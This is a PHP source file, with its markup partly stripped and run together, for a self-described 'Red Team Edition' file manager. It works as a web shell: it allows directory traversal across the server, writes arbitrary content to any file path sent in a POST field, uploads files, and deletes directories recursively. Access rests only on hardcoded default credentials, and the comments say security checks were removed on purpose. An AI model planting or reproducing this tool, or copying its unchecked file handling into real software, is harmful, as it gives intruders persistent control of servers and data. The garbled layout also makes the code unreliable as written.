// PHP File Manager for Red Teamers (File Traversal & Editing Enabled)// Use with caution. This version intentionally removes security features for pentesting.// --- Configuration ---$username = "admin"; // Change this$password = "password"; // Change this and use a strong password// ---------------------session_start();// --- Login Handling ---if (isset($_POST['username']) && isset($_POST['password'])) { if ($_POST['username'] === $username && password_verify($_POST['password'], password_hash($password, PASSWORD_DEFAULT))) { // Basic password hashing $_SESSION['loggedin'] = true; } else { $error = "Invalid login!"; }}if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true) { // Login form HTML... Login - File Manager <!DOCTYPE html><title>Login - File Manager</title><style>body{font-family:sans-serif;background-color:#f4f4f4}.login-container{width:300px;margin:100px auto;border:1px solid #ccc;padding:20px;background-color:#fff;box-shadow:0 0 10px rgba(0,0,0,.1)}input[type=text],input[type=password]{width:93%;padding:10px;margin-bottom:10px;border:1px solid #ccc}input[type=submit]{width:100%;padding:10px;background-color:#5cb85c;color:#fff;border:none;cursor:pointer}input[type=submit]:hover{background-color:#4cae4c}</style><div class=login-container>

File Manager Login

if(isset($error)){echo "<p style=color:red>$error</p>";}
<label for=username>Username:</label><input type=text id=username name=username required><label for=password>Password:</label><input type=password id=password name=password required><input type=submit value=Login>
</div> exit;}if (isset($_GET['logout'])) { session_destroy(); header("Location: " . basename(__FILE__)); exit;}// --- Path Handling ---$path = isset($_GET['path']) ? $_GET['path'] : '.';$real_path = realpath($path);if ($real_path === false) { $path = '.'; $real_path = realpath($path);}// --- NEW: File Editing Logic ---if (isset($_POST['save_content'])) { $file_to_save = $_POST['file_to_save']; $content = $_POST['file_content']; // Use stripslashes if magic quotes are enabled (common on older PHP) if (get_magic_quotes_gpc()) { $content = stripslashes($content); } if (file_put_contents($file_to_save, $content) !== false) { $_SESSION['message'] = "File saved successfully!"; } else { $_SESSION['message'] = "Error: Could not save the file!"; } header("Location: ?path=" . urlencode($path)); exit;}// --- Other File Operations ---if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_POST['save_content'])) { // File Upload if (isset($_FILES['file'])) { $target_file = rtrim($real_path, '/') . '/' . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { $_SESSION['message'] = "File uploaded successfully!"; } else { $_SESSION['message'] = "Error uploading file!"; } } // Create Directory if (isset($_POST['new_dir']) && !empty(trim($_POST['new_dir']))) { $new_dir_path = rtrim($real_path, '/') . '/' . $_POST['new_dir']; if (!file_exists($new_dir_path)) { mkdir($new_dir_path, 0755, true); $_SESSION['message'] = "Directory created successfully!"; } else { $_SESSION['message'] = "Directory already exists!"; } } header("Location: ?path=" . urlencode($path)); exit;}// Delete File or Directoryif (isset($_GET['delete'])) { $item_to_delete = rtrim($real_path, '/') . '/' . urldecode($_GET['delete']); if (file_exists($item_to_delete)) { // ... (delete logic is same as before) if (is_dir($item_to_delete)) { function rrmdir($dir){if(is_dir($dir)){$objects=scandir($dir);foreach($objects as $object){if($object!="."&&$object!=".."){if(is_dir($dir.DIRECTORY_SEPARATOR.$object)&&!is_link($dir.DIRECTORY_SEPARATOR.$object))rrmdir($dir.DIRECTORY_SEPARATOR.$object);else unlink($dir.DIRECTORY_SEPARATOR.$object);}}rmdir($dir);}} rrmdir($item_to_delete); $_SESSION['message']="Directory deleted successfully!"; } else { unlink($item_to_delete); $_SESSION['message']="File deleted successfully!"; } } header("Location: ?path=" . urlencode($path)); exit;}<!DOCTYPE html>File Manager [Red Team Edition] <title>File Manager [Red Team Edition]</title> <style> body { font-family: Consolas, "Courier New", monospace; font-size: 14px; background-color: #f4f4f4; color: #333;} .container { max-width: 960px; margin: 20px auto; background-color: #fff; padding: 20px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } table { width: 100%; border-collapse: collapse; } th, td { border: 1px solid #ddd; padding: 8px; text-align: left; white-space: nowrap; } th { background-color: #333; color: #fff; } a { text-decoration: none; color: #007bff; } a:hover { text-decoration: underline; } .actions a { margin-right: 10px; } .form-container { margin-bottom: 20px; padding: 15px; border: 1px solid #ddd; background-color: #f9f9f9; } .logout { float: right; padding: 5px 10px; background-color: #d9534f; color: white; border-radius: 3px; margin-bottom: 10px; } .logout:hover { background-color: #c9302c; text-decoration: none;} .path { word-break: break-all; background-color: #eee; padding: 5px; border-radius: 3px; margin-bottom: 15px;} .icon { display: inline-block; width: 20px; } /* Editor styles */ .editor-container { } .editor-textarea { width: 98%; height: 500px; font-family: inherit; font-size: 14px; border: 1px solid #ccc; padding: 1%; } .editor-actions { margin-top: 10px; } </style><div class="container"> <a href="?logout=true" class="logout">Logout</a>

File Manager [Red Team Edition]

<p class="path">Current Path: echo htmlspecialchars($real_path); </p> if (isset($_SESSION['message'])) { echo "<p style='font-weight:bold; color:green;'>".$_SESSION['message']."</p>"; unset($_SESSION['message']); } // --- NEW: File Editor UI --- if (isset($_GET['edit'])): $file_to_edit_path = $real_path . '/' . urldecode($_GET['edit']); if (is_file($file_to_edit_path) && is_readable($file_to_edit_path)): $content = htmlspecialchars(file_get_contents($file_to_edit_path)); <div class="editor-container">

Editing: echo htmlspecialchars(urldecode($_GET['edit']));

<textarea name="file_content" class="editor-textarea"> echo $content; </textarea> <div class="editor-actions"> <a href="?path= echo urlencode($path); ">Cancel</a> </div>
</div> else: echo "<p style='color:red;'>Error: Cannot read the file or file does not exist.</p>"; echo "<a href='?path=".urlencode($path)."'>Back to list</a>"; endif; // --- ELSE, show file list (Original UI) --- else: <div class="form-container">

Upload File

</div> <div class="form-container">

Create Directory

</div> <thead><th>Name</th><th>Type</th><th>Size (KB)</th><th>Actions</th></thead> <tbody> if ($real_path && $real_path != DIRECTORY_SEPARATOR) { echo ""; } $files = @scandir($path) ?: []; $folders = []; $items = []; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; if (@is_dir($path . '/' . $file)) { $folders[] = $file; } else { $items[] = $file; } } foreach (array_merge($folders, $items) as $file) { $filePath = $real_path . '/' . $file; $isDir = is_dir($filePath); echo ""; echo ""; echo ""; echo ""; echo "<td class='actions'>"; if (!$isDir) { echo "<a href='" . htmlspecialchars($path . '/' . $file, ENT_QUOTES, 'UTF-8') . "' download>Download</a>"; // --- NEW: Edit Link --- echo "<a href='?path=".urlencode($path)."&edit=".urlencode($file)."'>Edit</a>"; } echo "<a href='?path=".urlencode($path)."&delete=".urlencode($file)."' onclick='return confirm(\"Are you sure?\");'>Delete</a>"; echo ""; echo ""; } </tbody>
<span class='icon'>&#128193;</span> <a href='?path=" . urlencode($path . '/..') . "'>.. (Parent Directory)</a>
"; if ($isDir) { echo "<span class='icon'>&#128193;</span> <a href='?path=" . urlencode($path . '/' . $file) . "'>" . htmlspecialchars($file) . "</a>"; } else { echo "<span class='icon'>&#128196;</span> " . htmlspecialchars($file); } echo "" . ($isDir ? 'Directory' : 'File') . "" . ($isDir ? '--' : round(@filesize($filePath) / 1024, 2)) . "
endif; </div>